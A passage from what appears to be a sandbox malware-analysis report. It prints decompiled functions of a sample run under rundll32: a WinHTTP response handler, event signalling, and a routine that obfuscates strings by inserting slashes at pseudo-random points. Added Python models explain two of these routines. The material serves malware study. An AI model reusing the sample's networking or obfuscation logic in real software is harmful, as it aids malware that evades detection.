                                                   • Associated: 0000000C.00000002.327462101.000000000547C000.00000002.00020000.sdmp
                                                   • Associated: 0000000C.00000002.327502274.000000000547D000.00000004.00020000.sdmp
                                                   • Associated: 0000000C.00000002.327543577.000000000547F000.00000002.00020000.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_12_2_5470000_rundll32.jbxd
                                                  Similarity
                                                  • API ID: ObjectSingleWait$CloseCreateEventFreeHandleHeaplstrcatlstrcpylstrlen
                                                  • String ID:
                                                  • API String ID: 73268831-0
                                                  • Opcode ID: 8c5060f233bdceba93409d70392cf86f41c0b58e095c314dda01fe74baf350c9
                                                  • Instruction ID: 1896e0cff7faf9c575c238f33359de55e34ddbbdd0c4486e0f1a32a8b1a48d97
                                                  • Opcode Fuzzy Hash: 8c5060f233bdceba93409d70392cf86f41c0b58e095c314dda01fe74baf350c9
                                                  • Instruction Fuzzy Hash: BA21283271025D9BCB315EE95C48AFB7BA9FF88710F16065BFA5AEB240DB71C8018690
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  C-Code - Quality: 38%
                                                  			E0547A0B2(void* __ecx, void* __esi) {
                                                  				char _v8;
                                                  				long _v12;
                                                  				char _v16;
                                                  				long _v20;
                                                  				long _t34;
                                                  				long _t39;
                                                  				long _t42;
                                                  				long _t56;
                                                  				intOrPtr _t58;
                                                  				void* _t59;
                                                  				intOrPtr* _t60;
                                                  				void* _t61;
                                                  
                                                  				_t61 = __esi;
                                                  				_t59 = __ecx;
                                                   				_t60 =  *0x547d144; // 0x547ad81: import resolved at runtime; the info levels passed to it below (0x20000013, 0x16) are those of WinHttpQueryHeaders (inferred)
                                                  				 *((intOrPtr*)(__esi + 0x2c)) = 0;
                                                  				do {
                                                   					_t34 = WaitForSingleObject( *(_t61 + 0x1c), 0);   // poll the completion event without blocking
                                                  					_v20 = _t34;
                                                  					if(_t34 != 0) {
                                                  						L3:
                                                  						_push( &_v16);
                                                  						_push( &_v8);
                                                  						_push(_t61 + 0x2c);
                                                   						_push(0x20000013);                    // WINHTTP_QUERY_STATUS_CODE (0x13) | WINHTTP_QUERY_FLAG_NUMBER (0x20000000): status code as a DWORD
                                                   						_push( *((intOrPtr*)(_t61 + 0x18)));  // request handle
                                                   						_v8 = 4;                              // sizeof(DWORD)
                                                  						_v16 = 0;
                                                  						if( *_t60() == 0) {
                                                  							_t39 = GetLastError();
                                                  							_v12 = _t39;
                                                   							if(_v20 == 0 || _t39 != 0x2ef3) {   // 0x2ef3 = ERROR_WINHTTP_INCORRECT_HANDLE_STATE (12019); retried only when the event was not yet signaled
                                                  								L15:
                                                  								return _v12;
                                                  							} else {
                                                  								goto L11;
                                                  							}
                                                  						}
                                                  						if(_v8 != 4 ||  *((intOrPtr*)(_t61 + 0x2c)) == 0) {
                                                  							goto L11;
                                                  						} else {
                                                  							_v16 = 0;
                                                  							_v8 = 0;
                                                   							 *_t60( *((intOrPtr*)(_t61 + 0x18)), 0x16, 0,  &_v8,  &_v16);   // size probe: 0x16 = WINHTTP_QUERY_RAW_HEADERS_CRLF with an empty buffer leaves the required length in _v8
                                                   							_t58 = E05472049(_v8 + 1);           // allocate required length + 1 (heap helper)
                                                  							if(_t58 == 0) {
                                                   								_v12 = 8;                        // 8 = ERROR_NOT_ENOUGH_MEMORY
                                                  							} else {
                                                  								_push( &_v16);
                                                  								_push( &_v8);
                                                  								_push(_t58);
                                                  								_push(0x16);
                                                  								_push( *((intOrPtr*)(_t61 + 0x18)));
                                                  								if( *_t60() == 0) {
                                                  									E05479039(_t58);
                                                  									_v12 = GetLastError();
                                                  								} else {
                                                   									 *((char*)(_t58 + _v8)) = 0;          // NUL-terminate the raw header block
                                                   									 *((intOrPtr*)(_t61 + 0xc)) = _t58;   // and keep it at +0xc
                                                  								}
                                                  							}
                                                  							goto L15;
                                                  						}
                                                  					}
                                                  					SetEvent( *(_t61 + 0x1c));
                                                  					_t56 =  *((intOrPtr*)(_t61 + 0x28));
                                                  					_v12 = _t56;
                                                  					if(_t56 != 0) {
                                                  						goto L15;
                                                  					}
                                                  					goto L3;
                                                  					L11:
                                                   					_t42 = E05471C47( *(_t61 + 0x1c), _t59, 0xea60);   // wait up to 0xea60 = 60 000 ms for the completion event
                                                  					_v12 = _t42;
                                                  				} while (_t42 == 0);
                                                  				goto L15;
                                                  			}
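The two decompiled functions above (the read loop at the top of this section and E0547A0B2) together implement one asynchronous WinHTTP response handler: query the status code as a number, size-probe and copy the raw header block, then read the body in 0x1000-byte chunks, parking on a completion event whenever a read returns ERROR_IO_PENDING. The model below is an added example, not the sample's code and not decompiler output; FakeRequest is a hypothetical stand-in for the request handle, its completion event and the callback-stored error (+0x28), so it runs offline without WinHTTP. It simplifies one detail: the non-blocking pre-poll of the event is folded into the retry.

```python
# Constructed model of the asynchronous WinHTTP response handling seen in the
# decompiled functions above. FakeRequest and fetch_response are hypothetical
# names; only the constants are real Win32/WinHTTP values.
from dataclasses import dataclass, field

ERROR_SUCCESS = 0
ERROR_INSUFFICIENT_BUFFER = 122
ERROR_IO_PENDING = 0x3E5                       # 997
ERROR_WINHTTP_INCORRECT_HANDLE_STATE = 0x2EF3  # 12019
WINHTTP_QUERY_STATUS_CODE = 0x13               # 19
WINHTTP_QUERY_RAW_HEADERS_CRLF = 0x16          # 22
WINHTTP_QUERY_FLAG_NUMBER = 0x20000000
READ_CHUNK = 0x1000                            # bytes per read, as in the sample
WAIT_MS = 0xEA60                               # 60 000 ms, as in E0547A0B2


@dataclass
class FakeRequest:
    """Scripted request handle: what the server 'sends' and which reads pend."""
    status: int
    raw_headers: str
    body: bytes
    pending_reads: set = field(default_factory=set)  # 1-based read calls that pend
    not_ready: int = 0        # status queries that first fail with INCORRECT_HANDLE_STATE
    async_error: int = 0      # error the completion callback would store at +0x28
    last_error: int = 0
    _pos: int = 0
    _reads: int = 0
    _pending: bytes = b""

    def query_headers(self, info_level: int, buf_len: int):
        """WinHttpQueryHeaders stand-in: (ok, value); on a size probe value = needed."""
        if info_level == WINHTTP_QUERY_STATUS_CODE | WINHTTP_QUERY_FLAG_NUMBER:
            if self.not_ready:
                self.not_ready -= 1
                self.last_error = ERROR_WINHTTP_INCORRECT_HANDLE_STATE
                return False, 0
            return True, self.status
        if info_level == WINHTTP_QUERY_RAW_HEADERS_CRLF:
            needed = len(self.raw_headers)
            if buf_len < needed:
                self.last_error = ERROR_INSUFFICIENT_BUFFER
                return False, needed
            return True, self.raw_headers
        self.last_error = 87  # ERROR_INVALID_PARAMETER
        return False, 0

    def read_data(self, n: int):
        """WinHttpReadData stand-in: (ok, data); a pending read delivers via the event."""
        self._reads += 1
        chunk, self._pos = self.body[self._pos:self._pos + n], self._pos + n
        if self._reads in self.pending_reads:
            self._pending, self.last_error = chunk, ERROR_IO_PENDING
            return False, b""
        return True, chunk

    def wait_event(self, timeout_ms: int) -> int:
        """Completion-event wait; the callback has run when it returns 0 (WAIT_OBJECT_0)."""
        return 0


def fetch_response(req: FakeRequest):
    """Return (status, raw_headers, body, error) following the sample's control flow."""
    # phase 1 (E0547A0B2): numeric status code; INCORRECT_HANDLE_STATE means the
    # headers have not arrived yet, so wait on the event (60 s) and retry
    while True:
        ok, status = req.query_headers(WINHTTP_QUERY_STATUS_CODE | WINHTTP_QUERY_FLAG_NUMBER, 4)
        if ok:
            break
        if req.last_error != ERROR_WINHTTP_INCORRECT_HANDLE_STATE or req.wait_event(WAIT_MS) != 0:
            return None, None, b"", req.last_error
        if req.async_error:
            return None, None, b"", req.async_error
    # phase 2 (E0547A0B2): size probe with an empty buffer, allocate needed + 1, query again
    _, needed = req.query_headers(WINHTTP_QUERY_RAW_HEADERS_CRLF, 0)
    ok, headers = req.query_headers(WINHTTP_QUERY_RAW_HEADERS_CRLF, needed + 1)
    if not ok:
        return status, None, b"", req.last_error
    # phase 3 (read loop): read a chunk, park on the event when the read pends,
    # check the callback-stored error, stop on zero bytes
    body = bytearray()
    while True:
        ok, chunk = req.read_data(READ_CHUNK)        # ResetEvent precedes each read
        if not ok:
            if req.last_error != ERROR_IO_PENDING:
                return status, headers, bytes(body), req.last_error
            if req.wait_event(0xFFFFFFFF) != 0:      # INFINITE, as in the decompiled loop
                return status, headers, bytes(body), req.last_error
            if req.async_error:
                return status, headers, bytes(body), req.async_error
            chunk = req._pending                      # bytes the callback reported
        if not chunk:                                 # zero bytes read: response complete
            return status, headers, bytes(body), ERROR_SUCCESS
        body += chunk
```

The scripted handle lets you exercise the three paths the decompiled code distinguishes: a status query that is retried after ERROR_WINHTTP_INCORRECT_HANDLE_STATE, a read that pends and is completed through the event, and a completion callback that reports an error, which aborts the loop with that error rather than with GetLastError().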
















                                                  APIs
                                                  • WaitForSingleObject.KERNEL32(?,00000000,00000000,00000102,?,00000000,00000000,751881D0), ref: 0547A0C9
                                                  • SetEvent.KERNEL32(?), ref: 0547A0D9
                                                  • GetLastError.KERNEL32 ref: 0547A162
                                                    • Part of subcall function 05471C47: WaitForMultipleObjects.KERNEL32(00000002,0547AA72,00000000,0547AA72,?,?,?,0547AA72,0000EA60), ref: 05471C62
                                                    • Part of subcall function 05479039: HeapFree.KERNEL32(00000000,00000000,05477F18,00000000,?,?,00000000), ref: 05479045
                                                  • GetLastError.KERNEL32(00000000), ref: 0547A197
                                                  Memory Dump Source
                                                  • Source File: 0000000C.00000002.327430811.0000000005471000.00000020.00020000.sdmp, Offset: 05470000, based on PE: true
                                                  • Associated: 0000000C.00000002.327411337.0000000005470000.00000004.00020000.sdmp
                                                  • Associated: 0000000C.00000002.327462101.000000000547C000.00000002.00020000.sdmp
                                                  • Associated: 0000000C.00000002.327502274.000000000547D000.00000004.00020000.sdmp
                                                  • Associated: 0000000C.00000002.327543577.000000000547F000.00000002.00020000.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_12_2_5470000_rundll32.jbxd
                                                  Similarity
                                                  • API ID: ErrorLastWait$EventFreeHeapMultipleObjectObjectsSingle
                                                  • String ID:
                                                  • API String ID: 602384898-0
                                                  • Opcode ID: 0d3a098cd01153e78df70538a6fa78509ab8245347167cce4ae8b0248cd01fdc
                                                  • Instruction ID: 182ca6e4eee8a54477c72ba7cc88193bb959dc637cef5d790fa96ba9f01fdec9
                                                  • Opcode Fuzzy Hash: 0d3a098cd01153e78df70538a6fa78509ab8245347167cce4ae8b0248cd01fdc
                                                  • Instruction Fuzzy Hash: B931EDB590024CEFEB21DFD6CC849EEBBB9FB04240F5049ABE542E2240D7709A459F50
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  C-Code - Quality: 40%
                                                  			E05473BF1(void* __ecx, void* __eflags, intOrPtr _a4, signed int* _a8, intOrPtr _a12) {
                                                  				intOrPtr _v12;
                                                  				void* _v16;
                                                  				void* _v28;
                                                  				char _v32;
                                                  				void* __esi;
                                                  				void* _t29;
                                                  				void* _t38;
                                                  				signed int* _t39;
                                                  				void* _t40;

                                                  				_t36 = __ecx;
                                                  				// Zero a 24-byte context struct on the stack (_v32 .. _v12): one store plus five stosd.
                                                  				_v32 = 0;
                                                  				asm("stosd");
                                                  				asm("stosd");
                                                  				asm("stosd");
                                                  				asm("stosd");
                                                  				asm("stosd");
                                                  				_v12 = _a4;
                                                  				// Initialise the context; a non-zero status skips straight to the cleanup path (L12/L13) and is returned.
                                                  				_t38 = E05479763(__ecx, &_v32);
                                                  				if(_t38 != 0) {
                                                  					L12:
                                                  					_t39 = _a8;
                                                  					L13:
                                                  					// Cleanup: if _a8 is a struct whose flag bit 0 is clear and whose second field is set, release that field.
                                                  					if(_t39 != 0 && ( *_t39 & 0x00000001) == 0) {
                                                  						_t16 = &(_t39[1]); // 0x5
                                                  						_t23 = _t16;
                                                  						if( *_t16 != 0) {
                                                  							E0547A022(_t23);
                                                  						}
                                                  					}
                                                  					return _t38;
                                                  				}
                                                  				if(E0547A72D(0x40, &_v16) != 0) {
                                                  					_v16 = 0;
                                                  				}
                                                  				// Manual-reset event (bManualReset = 1, initially non-signalled) named by the string pointer stored at 0x547d344,
                                                  				// with the SECURITY_ATTRIBUTES at 0x547d2a8. It is signalled, held for 3000 ms (0xbb8) and closed again:
                                                  				// a one-shot notification to whatever else is waiting on that event name.
                                                  				_t40 = CreateEventA(0x547d2a8, 1, 0, *0x547d344);
                                                  				if(_t40 != 0) {
                                                  					SetEvent(_t40);
                                                  					Sleep(0xbb8);
                                                  					CloseHandle(_t40);
                                                  				}
                                                  				// Hand the context to one of two workers depending on _a12; the second takes five extra zero arguments.
                                                  				_push( &_v32);
                                                  				if(_a12 == 0) {
                                                  					_t29 = E05478A51(_t36);
                                                  				} else {
                                                  					_push(0);
                                                  					_push(0);
                                                  					_push(0);
                                                  					_push(0);
                                                  					_push(0);
                                                  					_t29 = E054717D5(_t36);
                                                  				}
                                                  				_t41 = _v16;
                                                  				_t38 = _t29;
                                                  				// Release whatever E0547A72D acquired.
                                                  				if(_v16 != 0) {
                                                  					E05471F99(_t41);
                                                  				}
                                                  				if(_t38 != 0) {
                                                  					goto L12;
                                                  				} else {
                                                  					// Worker returned zero: E054742EA runs on the context and _a8, and its status becomes the return value.
                                                  					_t39 = _a8;
                                                  					_t38 = E054742EA( &_v32, _t39);
                                                  					goto L13;
                                                  				}
                                                  			}

                                                  [Per-line instruction addresses for the listing above, 0x05473bf1 to 0x05473cc5 (0x00000000 = line with no instruction), omitted from this text rendering]

                                                  APIs
                                                  • CreateEventA.KERNEL32(0547D2A8,00000001,00000000,00000040,00000001,?,7519F710,00000000,7519F730,?,?,?,05476880,?,00000001,?), ref: 05473C42
                                                  • SetEvent.KERNEL32(00000000,?,?,?,05476880,?,00000001,?,00000002,?,?,05472417,?), ref: 05473C4F
                                                  • Sleep.KERNEL32(00000BB8,?,?,?,05476880,?,00000001,?,00000002,?,?,05472417,?), ref: 05473C5A
                                                  • CloseHandle.KERNEL32(00000000,?,?,?,05476880,?,00000001,?,00000002,?,?,05472417,?), ref: 05473C61
                                                    • Part of subcall function 05478A51: WaitForSingleObject.KERNEL32(00000000,?,?,?,05473C81,?,05473C81,?,?,?,?,?,05473C81,?), ref: 05478B2B
                                                  Memory Dump Source
                                                  • Source File: 0000000C.00000002.327430811.0000000005471000.00000020.00020000.sdmp, Offset: 05470000, based on PE: true
                                                  • Associated: 0000000C.00000002.327411337.0000000005470000.00000004.00020000.sdmp
                                                  • Associated: 0000000C.00000002.327462101.000000000547C000.00000002.00020000.sdmp
                                                  • Associated: 0000000C.00000002.327502274.000000000547D000.00000004.00020000.sdmp
                                                  • Associated: 0000000C.00000002.327543577.000000000547F000.00000002.00020000.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_12_2_5470000_rundll32.jbxd
                                                  Similarity
                                                  • API ID: Event$CloseCreateHandleObjectSingleSleepWait
                                                  • String ID:
                                                  • API String ID: 2559942907-0
                                                  • Opcode ID: 4828f60ac09d3fa592c8e67a554fc843175617d93139446ae92916009a990853
                                                  • Instruction ID: 9393f8daaf908346a18664b3a30285e48bf35864d89360df2efecbc41ff7ff5f
                                                  • Opcode Fuzzy Hash: 4828f60ac09d3fa592c8e67a554fc843175617d93139446ae92916009a990853
                                                  • Instruction Fuzzy Hash: 04216573D0021DAFCB20AFE588898EFB77DBF44250B15486BEA11E7240DB74D945DBA1
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  C-Code - Quality: 78%
                                                  			E05471A70(intOrPtr* __eax, void** _a4, intOrPtr* _a8) {
                                                  				intOrPtr _v8;
                                                  				void* _v12;
                                                  				void* _v16;
                                                  				intOrPtr _t26;
                                                  				intOrPtr* _t28;
                                                  				intOrPtr _t31;
                                                  				intOrPtr* _t32;
                                                  				void* _t39;
                                                  				int _t46;
                                                  				intOrPtr* _t47;
                                                  				int _t48;

                                                  				_t47 = __eax;              // __eax: a COM interface pointer (this)
                                                  				_push( &_v12);
                                                  				_push(__eax);
                                                  				_t39 = 0;
                                                  				_t46 = 0;
                                                  				// Virtual call through vtable slot 0x24 (method index 9): this->Method9(&_v12); returns an HRESULT and an object pointer.
                                                  				_t26 =  *((intOrPtr*)( *__eax + 0x24))();
                                                  				_v8 = _t26;
                                                  				if(_t26 < 0) {
                                                  					L13:
                                                  					return _v8;            // HRESULT
                                                  				}
                                                  				// Succeeded but produced no object: wait 200 ms (0xc8) and retry once.
                                                  				if(_v12 == 0) {
                                                  					Sleep(0xc8);
                                                  					_v8 =  *((intOrPtr*)( *_t47 + 0x24))(_t47, &_v12);
                                                  				}
                                                  				if(_v8 >= _t39) {
                                                  					_t28 = _v12;
                                                  					if(_t28 != 0) {
                                                  						// Vtable slot 0x100 (method index 64) on the returned object: retrieves a BSTR into _v16.
                                                  						_t31 =  *((intOrPtr*)( *_t28 + 0x100))(_t28, &_v16);
                                                  						_v8 = _t31;
                                                  						if(_t31 >= 0) {
                                                  							_t46 = lstrlenW(_v16);
                                                  							if(_t46 != 0) {
                                                  								// Copy the wide string plus terminator into a buffer from the sample's own allocator.
                                                  								_t46 = _t46 + 1;
                                                  								_t48 = _t46 + _t46;
                                                  								_t39 = E05472049(_t48);
                                                  								if(_t39 == 0) {
                                                  									_v8 = 0x8007000e;  // E_OUTOFMEMORY
                                                  								} else {
                                                  									memcpy(_t39, _v16, _t48);
                                                  								}
                                                  								__imp__#6(_v16);       // oleaut32 ordinal 6 = SysFreeString
                                                  							}
                                                  						}
                                                  						_t32 = _v12;
                                                  						 *((intOrPtr*)( *_t32 + 8))(_t32);  // vtable slot 8 = IUnknown::Release
                                                  					}
                                                  					// Out-parameters: the copied buffer (NULL if the string was empty or allocation failed) and its size in bytes, terminator included.
                                                  					 *_a4 = _t39;
                                                  					 *_a8 = _t46 + _t46;
                                                  				}
                                                  				goto L13;
                                                  			}

                                                  [Per-line instruction addresses for the listing above, 0x05471a7c to 0x05471b2c (0x00000000 = line with no instruction), omitted from this text rendering]

                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 0000000C.00000002.327430811.0000000005471000.00000020.00020000.sdmp, Offset: 05470000, based on PE: true
                                                  • Associated: 0000000C.00000002.327411337.0000000005470000.00000004.00020000.sdmp
                                                  • Associated: 0000000C.00000002.327462101.000000000547C000.00000002.00020000.sdmp
                                                  • Associated: 0000000C.00000002.327502274.000000000547D000.00000004.00020000.sdmp
                                                  • Associated: 0000000C.00000002.327543577.000000000547F000.00000002.00020000.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_12_2_5470000_rundll32.jbxd
                                                  Similarity
                                                  • API ID: FreeSleepStringlstrlenmemcpy
                                                  • String ID:
                                                  • API String ID: 1198164300-0
                                                  • Opcode ID: 2c15ac84e6b5ef2c367ae0016327b6b47e53e403ba0b96dafa722bb76af68af1
                                                  • Instruction ID: 5454e0fdb14c2fc55a4d89dadb325e4e460c00bc6c94b50d74dadc22af0b59e1
                                                  • Opcode Fuzzy Hash: 2c15ac84e6b5ef2c367ae0016327b6b47e53e403ba0b96dafa722bb76af68af1
                                                  • Instruction Fuzzy Hash: 08211075A0020DEFCB11DFA9D988DDEBBB9FF49211B1041AAE906E7210EB70DA45CB50
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  C-Code - Quality: 68%
                                                  			E0547788B(unsigned int __eax, void* __ecx) {
                                                  				void* _v8;
                                                  				void* _v12;
                                                  				signed int _t21;
                                                  				signed short _t23;
                                                  				char* _t27;
                                                  				void* _t29;
                                                  				void* _t30;
                                                  				unsigned int _t33;
                                                  				void* _t37;
                                                  				unsigned int _t38;
                                                  				void* _t41;
                                                  				void* _t42;
                                                  				int _t45;
                                                  				void* _t46;

                                                  				_t42 = __eax;              // __eax: NUL-terminated input string
                                                  				__imp__(__eax, _t37, _t41, _t29, __ecx, __ecx);  // lstrlen(__eax) per the API trace (ref 05477896); the extra operands are register noise
                                                  				_t38 = __eax;              // bytes remaining
                                                  				// Output buffer of len + len/8 + 1 bytes: every chunk below is at least 8 bytes, so at most len/8 separators are inserted, plus the NUL.
                                                  				_t30 = RtlAllocateHeap( *0x547d238, 0, (__eax >> 3) + __eax + 1);
                                                  				_v12 = _t30;
                                                  				if(_t30 != 0) {
                                                  					_v8 = _t42;            // source cursor
                                                  					do {
                                                  						_t33 = 0x18;       // cap the chunk at 24 bytes, or at what is left
                                                  						if(_t38 <= _t33) {
                                                  							_t33 = _t38;
                                                  						}
                                                  						// Linear congruential generator x = x * 0x19660d + 0x3c6ef35f (mod 2^32), state in the global at 0x547d250
                                                  						// (the Numerical Recipes "quick and dirty" constants). Only the low 16 bits feed the chunk length.
                                                  						_t21 =  *0x547d250; // 0x0
                                                  						_t23 = 0x3c6ef35f + _t21 * 0x19660d;
                                                  						 *0x547d250 = _t23;
                                                  						// Chunk length in [8, cap-1]. The divisor is cap-8, so an input of 8 bytes or fewer makes the first iteration divide by zero or a negative value.
                                                  						_t45 = (_t23 & 0x0000ffff) % (_t33 + 0xfffffff8) + 8;
                                                  						memcpy(_t30, _v8, _t45);
                                                  						_v8 = _v8 + _t45;
                                                  						_t27 = _t30 + _t45;
                                                  						_t38 = _t38 - _t45;
                                                  						_t46 = _t46 + 0xc;     // cdecl stack cleanup after memcpy's three arguments
                                                  						 *_t27 = 0x2f;         // append '/'
                                                  						_t13 = _t27 + 1; // 0x1
                                                  						_t30 = _t13;
                                                  					} while (_t38 > 8);
                                                  					memcpy(_t30, _v8, _t38 + 1);  // copy the 1..8 byte tail together with its terminating NUL
                                                  				}
                                                  				return _v12;               // input with '/' inserted every 8..23 bytes; caller frees
                                                  			}
                                                  [Per-line instruction addresses for the listing above, 0x05477893 to 0x05477922, omitted from this text rendering]

                                                  APIs
                                                  • lstrlen.KERNEL32(00000000,00000000,00000000,00000000,?,?,?,0547839A,00000000,?,?,0547A428,?,073E95B0), ref: 05477896
                                                  • RtlAllocateHeap.NTDLL(00000000,?), ref: 054778AE
                                                  • memcpy.NTDLL(00000000,?,-00000008,?,?,?,0547839A,00000000,?,?,0547A428,?,073E95B0), ref: 054778F2
                                                  • memcpy.NTDLL(00000001,?,00000001), ref: 05477913
                                                  Memory Dump Source
                                                  • Source File: 0000000C.00000002.327430811.0000000005471000.00000020.00020000.sdmp, Offset: 05470000, based on PE: true
                                                  • Associated: 0000000C.00000002.327411337.0000000005470000.00000004.00020000.sdmp
                                                  • Associated: 0000000C.00000002.327462101.000000000547C000.00000002.00020000.sdmp
                                                  • Associated: 0000000C.00000002.327502274.000000000547D000.00000004.00020000.sdmp
                                                  • Associated: 0000000C.00000002.327543577.000000000547F000.00000002.00020000.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_12_2_5470000_rundll32.jbxd
                                                  Similarity
                                                  • API ID: memcpy$AllocateHeaplstrlen
                                                  • String ID:
                                                  • API String ID: 1819133394-0
                                                  • Opcode ID: 868bd68254280a06d63f56ee110d6a20adb12fe0cf0e5bc68b0424ac5ef367ef
                                                  • Instruction ID: b682affff40d2c9bd9f91a44b835b7b7bd8c05002103ffb9220eeea673b8d3c3
                                                  • Opcode Fuzzy Hash: 868bd68254280a06d63f56ee110d6a20adb12fe0cf0e5bc68b0424ac5ef367ef
                                                  • Instruction Fuzzy Hash: B111C672E10118AFD7148A6ADC89EDEBFAAEF85260B0501A6F505DB240EA709E05C7A0
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%
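
Added example, not part of the Joe Sandbox report or of the sample's code: a Python port of the chunk-and-slash routine decompiled as E0547788B above, together with its inverse, so the behaviour can be exercised offline. It assumes the global at 0x547d250 holds a full 32-bit generator state (the decompiler's signed short typing reflects only the later 16-bit mask), and it refuses inputs of 8 bytes or fewer, where the original would divide by zero or a negative value. The 40-byte input is constructed for the example and is not data from the analysis.

```python
# Added example (not code from the sample or the report): Python port of the
# routine decompiled as E0547788B, plus its inverse.
# Assumption: the global at 0x547d250 is a full 32-bit LCG state; the
# decompiler's "signed short" typing reflects only the later 16-bit mask.
from typing import Tuple

LCG_MUL = 0x19660D      # multiplier seen in E0547788B
LCG_INC = 0x3C6EF35F    # increment seen in E0547788B
MAX_CHUNK = 0x18        # per-iteration cap on chunk length (24)
MIN_CHUNK = 8           # the "+ 8" floor on every chunk


def lcg_next(state: int) -> int:
    """One step of x = x*0x19660d + 0x3c6ef35f (mod 2^32), as in the sample."""
    return (state * LCG_MUL + LCG_INC) & 0xFFFFFFFF


def insert_slashes(data: bytes, state: int) -> Tuple[bytes, int]:
    """Split data into pseudo-random chunks of 8..23 bytes joined by '/'.

    Mirrors the do/while loop: while more than 8 bytes remain, pick a chunk
    length (low16(state) % (cap - 8)) + 8, copy it, append '/'. The tail
    (always at least one byte) is copied without a trailing slash. Returns
    the new buffer and the advanced generator state so calls can be chained
    the way the sample's global is.
    """
    if len(data) <= MIN_CHUNK:
        # The decompiled loop would divide by (min(len, 24) - 8) here, i.e.
        # by zero or a negative value. This port refuses such input instead
        # of mimicking the bug.
        raise ValueError("input must be longer than 8 bytes")
    out = bytearray()
    pos = 0
    remaining = len(data)
    while True:
        cap = min(remaining, MAX_CHUNK)
        state = lcg_next(state)
        n = (state & 0xFFFF) % (cap - MIN_CHUNK) + MIN_CHUNK
        out += data[pos:pos + n]
        out += b"/"
        pos += n
        remaining -= n
        if remaining <= MIN_CHUNK:
            break
    out += data[pos:]
    return bytes(out), state


def alloc_bound(length: int) -> int:
    """Buffer size the sample requests: len + len//8 + 1 (for the NUL)."""
    return (length >> 3) + length + 1


def strip_slashes(obfuscated: bytes) -> bytes:
    """Inverse: the separators are literal '/' bytes, so removing every '/'
    recovers the original, provided the original contained no '/' itself."""
    return obfuscated.replace(b"/", b"")


# Constructed sample input (not from the report): 40 distinct bytes.
SAMPLE = b"0123456789abcdefghijklmnopqrstuvwxyzABCD"

if __name__ == "__main__":
    obf, _ = insert_slashes(SAMPLE, 0)
    print(obf.decode())
    print(strip_slashes(obf) == SAMPLE)
```

With the state starting at 0 (the dump shows 0 at 0x547d250), the 40-byte input is split 23/15/2, and the result stays within the len + len/8 + 1 allocation the sample makes. Stripping every '/' recovers the input, which is the check an analyst would apply to strings produced by this routine; it is only valid when the original data contains no '/' of its own.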

                                                  C-Code - Quality: 53%
                                                  			E05477A9A(intOrPtr _a4, intOrPtr _a8) {
                                                  				char _v20;
                                                  				void* _t8;
                                                  				void* _t13;
                                                  				void* _t16;
                                                  				char* _t18;
                                                  				void* _t19;

                                                  				_t19 = 0x27;               // 39-byte scratch allocation
                                                  				_t1 =  &_v20; // 0x74666f53  (the stack buffer starts with the bytes "Soft", read little-endian)
                                                  				_t18 = 0;
                                                  				E05476B43(_t8, _t1);       // fills the stack string at &_v20
                                                  				_t16 = E05472049(_t19);    // same allocator as in E05471A70 above
                                                  				if(_t16 != 0) {
                                                  					_t3 =  &_v20; // 0x74666f53
                                                  					_t13 = E054786D8(_t3, _t16, _a8);  // formats into the scratch buffer
                                                  					if(_a4 != 0) {
                                                  						__imp__(_a4);          // unresolved one-argument import on the optional prefix (lstrlen-style; its eax result is the likely operand below)
                                                  						_t19 = _t13 + 0x27;    // room for prefix length + 39
                                                  					}
                                                  					_t18 = E05472049(_t19);
                                                  					if(_t18 != 0) {
                                                  						 *_t18 = 0;
                                                  						if(_a4 != 0) {
                                                  							__imp__(_t18, _a4);  // unresolved (dst, src) import: copies the prefix _a4 ...
                                                  						}
                                                  						__imp__(_t18, _t16);     // ... then appends the generated string (lstrcpy/lstrcat argument pattern, not resolved by the decompiler)
                                                  					}
                                                  					E05479039(_t16);           // frees the scratch buffer (HeapFree, per the subcall trace of E05479039 above)
                                                  				}
                                                  				return _t18;                   // caller owns the concatenated string, or NULL on allocation failure
                                                  			}


                                                  APIs
                                                    • Part of subcall function 05472049: RtlAllocateHeap.NTDLL(00000000,00000000,05477E50), ref: 05472055
                                                    • Part of subcall function 054786D8: wsprintfA.USER32 ref: 05478734
                                                  • lstrlen.KERNEL32(054723E9,00000000,00000000,00000027,00000005,00000000,00000000,054796DA,74666F53,00000000,054723E9,0547D00C,?,054723E9), ref: 05477AD0
                                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 05477AF4
                                                  • lstrcat.KERNEL32(00000000,00000000), ref: 05477AFC
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000C.00000002.327430811.0000000005471000.00000020.00020000.sdmp, Offset: 05470000, based on PE: true
• Associated: 0000000C.00000002.327411337.0000000005470000.00000004.00020000.sdmp
• Associated: 0000000C.00000002.327462101.000000000547C000.00000002.00020000.sdmp
• Associated: 0000000C.00000002.327502274.000000000547D000.00000004.00020000.sdmp
• Associated: 0000000C.00000002.327543577.000000000547F000.00000002.00020000.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_12_2_5470000_rundll32.jbxd
                                                  Similarity
                                                  • API ID: AllocateHeaplstrcatlstrcpylstrlenwsprintf
                                                  • String ID: Soft
                                                  • API String ID: 393707159-3753413193
                                                  • Opcode ID: ac7fbfcd8202c82a6d7b8445557e2cfe626af541282c4d4e3ff0aeccf00413b2
                                                  • Instruction ID: 62ccba8ed1bcca0a637ed3ce256f296f3d0420257fbb003648705ae57616395f
                                                  • Opcode Fuzzy Hash: ac7fbfcd8202c82a6d7b8445557e2cfe626af541282c4d4e3ff0aeccf00413b2
                                                  • Instruction Fuzzy Hash: A601A23220065DB7CB12AAA6DC8CEEF7F69EF85245F04442BFA0655101EB758A45C7E1
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  C-Code - Quality: 68%
                                                  			E0547757F() {
                                                  				char _v264;
                                                  				void* _v300;
                                                  				int _t8;
                                                  				intOrPtr _t9;
                                                  				int _t15;
                                                  				void* _t17;
                                                  
                                                  				_t15 = 0;
